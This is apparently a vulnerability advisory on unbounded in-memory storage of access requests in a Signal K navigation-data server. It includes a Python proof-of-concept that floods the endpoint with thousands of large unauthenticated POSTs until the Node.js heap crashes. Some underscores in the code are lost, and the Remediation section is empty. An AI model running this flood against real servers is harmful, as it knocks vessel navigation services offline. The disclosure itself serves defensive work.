Summary

Details

1. In-Memory Storage: In src/requestResponse.js, requests are stored in a simple JavaScript object:

const requests = {}

2. Unbounded Growth: The createRequest function adds new requests to this object without checking the current size or count of existing requests.
3. Infrequent Pruning: The pruneRequests function, which removes old requests, runs only once every 15 minutes (pruneIntervalRate).
4. No Rate Limiting: The endpoint /signalk/v1/access/requests accepts POST requests from any client without any rate limiting or authentication (by design, as it's for initial access requests).

1. An attacker sends a large number of POST requests (e.g., 20,000+) or requests with large payloads to /signalk/v1/access/requests.
2. The server stores every request in the requests object in the Node.js heap.
3. The heap memory usage spikes rapidly.
4. The Node.js process hits its memory limit (default ~1.5GB) and crashes with FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory.

PoC

import urllib.request
import json
import threading
import time

# Target Configuration
TARGET URL = "http://localhost:3000/signalk/v1/access/requests"
PAYLOAD SIZE MB = 0.1 # 100 KB per request
NUM REQUESTS = 20000  # Sufficient to exhaust heap
CONCURRENCY = 50

# Generate a large string payload
LARGE STRING = "A" * (int(PAYLOAD SIZE MB * 1024 * 1024))

def send heavy request(i):
  try:
    payload = {
      "clientId": f"attacker-device-{i}",
      "description": LARGE STRING, # Stored in memory!
      "permissions": "readwrite"
    }
    data = json.dumps(payload).encode('utf-8')
    
    req = urllib.request.Request(
      TARGET URL, 
      data=data, 
      headers={'Content-Type': 'application/json'}, 
      method='POST'
    )
    # Short timeout as server might hang
    urllib.request.urlopen(req, timeout=5)
  except:
    pass

def attack():
  print(f"[*] Starting DoS Attack on {TARGET URL}...")
  threads = []
  for i in range(NUM REQUESTS):
    t = threading.Thread(target=send heavy request, args=(i,))
    threads.append(t)
    t.start()
    
    if len(threads) >= CONCURRENCY:
      for t in threads: t.join()
      threads = []

if  name  == " main ":
  attack()

Impact

1. Rapid Memory Exhaustion: The Node.js process memory usage increased by approximately 30MB within seconds of starting the attack.
2. Service Instability: Continued execution of the PoC quickly leads to a FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory crash.
3. Service Unavailability: The server becomes completely unresponsive and terminates, requiring a manual restart to recover. This allows an unauthenticated attacker to easily take the vessel's navigation data server offline.

Remediation